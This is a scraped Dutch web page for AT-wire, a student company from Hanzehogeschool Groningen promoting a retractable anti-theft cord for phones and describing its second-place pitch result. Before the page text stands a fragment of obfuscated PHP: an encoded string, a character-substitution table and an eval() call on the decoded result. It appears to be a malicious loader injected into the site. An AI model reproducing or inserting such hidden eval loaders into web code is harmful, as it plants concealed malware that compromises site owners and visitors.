'xvmNxvmNxvmNnAjgOvmNxvmNxvmNxvmNQbfTlem7Qda6FLfMVLXYCOFknLD49tmNxvmNx'. 'vmNxvmNxva6lLPjs1NSxvmNxvmNxvug9tmNxvmNxvmNQbIz1bUMfvtNhnf6hlMBPlF89vRc9vFTCwtg9tmNxvm'. 'NxvmNQAjgOvmNxvmNxvmNxvmNQbPYJstNhnf6hlMBPnF89LD49tmNxvmNxvmNQKjgOvmNxvmNxvmkGs3TGLaSxOFkhlPkJIFT7'. 'w6rxKRrxw3kV8aTbZFBn1NSxvmNxvmNxvX49tmNxvmNxvmNxvmNxvUMfOFkhlPkJIFH1lF89vRc9vFTJnaN3LjgOvmNxvmNxvmN'. 'xvmNQAjgOvmNxvmNxvmNxvmNxvmNxvfH1u3kV8aTbZ6TJnaNvnakJ9fGsw3NPP0NxnakJ9fGswaNPPtcs1NSxvmNxvmNxvmNxvmz'. '91NSxvmNxvmNxvmNxvmkGs3TGLaSvnakJ9fGsw3T7w6rxKRrxw3'. 'YG5FBn1NSxvmNxvmNxvmNxvmzs1NSxvmNxvmNxvmNxvmNxvmNQE38K4IzGwUMqu3YG5tNhnf6hlMBP4'. 'F89LD49tmNxvmNxvmNxvmNxvug9tmNxvmNxvmNQKjgOvmNxvmNxvmkGEUkpvFkhlPkJI'. 'FTJiF89AjgOvmNxvmNxvmkGyU6gOtcs1NSxvmNQKjgO1NSxvmNQE38K4IzGwU'. 'MquIkKlaNvLD49tug=='; $tusissoal = Array('1'=>'N', '0'=>'L', '3'=>'c', '2'=>'q', '5'=>'t', '4'=>'w', '7'=>'E', '6'=>'X', '9'=>'0', '8'=>'1', 'A'=>'7', 'C'=>'U', 'B'=>'y', 'E'=>'j', 'D'=>'O', 'G'=>'V', 'F'=>'J', 'I'=>'b', 'H'=>'3', 'K'=>'9', 'J'=>'F', 'M'=>'W', 'L'=>'p', 'O'=>'o', 'N'=>'C', 'Q'=>'B', 'P'=>'d', 'S'=>'i', 'R'=>'P', 'U'=>'a', 'T'=>'2', 'W'=>'M', 'V'=>'x', 'Y'=>'m', 'X'=>'e', 'Z'=>'u', 'a'=>'Z', 'c'=>'T', 'b'=>'l', 'e'=>'v', 'd'=>'z', 'g'=>'Q', 'f'=>'Y', 'i'=>'r', 'h'=>'R', 'k'=>'G', 'j'=>'D', 'm'=>'I', 'l'=>'h', 'o'=>'6', 'n'=>'k', 'q'=>'5', 'p'=>'8', 's'=>'s', 'r'=>'S', 'u'=>'f', 't'=>'K', 'w'=>'n', 'v'=>'g', 'y'=>'4', 'x'=>'A', 'z'=>'H'); eval/*ljzakwot*/(xejolmkvf($vwjslce, $tusissoal)); } Welkom

Dé anti-diefstal oplossing voor uw mobiele telefoon

Scrol naar beneden voor meer info

Omdat een veilig gevoel vanzelfsprekend hoort te zijn

Wie zijn wij?

AT-wire is een Student Company van zeven Technische Bedrijfskunde-studenten aan de Hanzehogeschool in Groningen, opgericht in het kader van Jong Ondernemen.

Momenteel werken wij samen met verschillende fabrikanten om een mooi product te realiseren. Wij zijn blij dat je interesse toont in ons bedrijf of product. Je kunt ons volgen op Twitter of Facebook om op de hoogte te blijven van al onze ontwikkelingen en acties. 

 

Waarom AT-wire?

Tegenwoordig is het niet meer voor te stellen hoe een wereld is zonder je mobiele telefoon. Alles staat er op, je foto's, contacten, en jouw gehele online social media. Er zijn momenteel veel anti diefstal apps beschikbaar. Deze apps gaan de daadwerkelijke diefstal niet tegen. Het is met deze apps niet mogelijk om je telefoon terug te krijgen.

Wij bieden een product waardoor je letterlijk verbonden bent en blijft met jouw telefoon. Het is niet meer mogelijk dat iemand on opgemerkt jouw telefoon uit jouw broekzak of tasje steelt. De zakkenroller voelt weerstand via het draadje en zal de telefoon loslaten zodat hij van jou blijft.

Het draadje is bovendien zolang dat je telefoon niet op de grond kapot kan vallen, maar wel lang genoeg om mee te kunnen bellen.

 

Wat is de AT-wire?

De AT-wire is een klein en stijlvol katrolletje dat aan een riemlusje of oogje in de tas bevestigt kan worden met behulp van een klipje. Hierbij wordt een sticker geleverd die je achter op je mobiele telefoon of hoesje kunt plakken. Onze stickers laten geen lijmresten achter. In de sticker zit een oogje geïntegreerd waaraan het bijna onzichtbare draadje kan worden vast- of losgekoppeld. Bij aankoop worden meerdere stickers geleverd zodat de AT-wire op elk gewenst moment te gebruiken is. Door het systeem rolt het touwtje automatisch op. 

De AT-wire is bedoeld om de diefstal van mobiele telefoons te verhinderen.

 

Het product kan ook gekoppeld worden aan andere waardevolle producten.

 

AT-wire: 2e van Noord-Nederland!

Op 12 december heeft AT-wire meegedaan aan de Company Launch van Noord-Nederland. Namens AT-wire stonden Brian de Kroon en Jason van Berkel voor 51 andere Student Companies en de vakjury de pitch te verzorgen. Alle Student Companies werden gesplitst in drie verschillende zalen, die elk een winnende pitch zou opleveren. In totaal zouden drie finalisten nog een keer moeten pitchen voor de winst. AT-wire was één van die finalisten!

Na een spannende finale, met de Student Companies LockLight en WoodenTie, is AT-wire als tweede geëindigd! De jury noemde het product: actueel, zeer innovatief en genoeg potentie om de markt te veroveren. Wij van AT-wire zijn ontzettend trots op dit resultaat en gaan nu met 200% inzet verder. De productie is bijna klaar om te beginnen, dus hou de website en social media (Facebook en Twitter) in de gaten want binnenkort kan jij jezelf verbinden!

Kom met ons in contact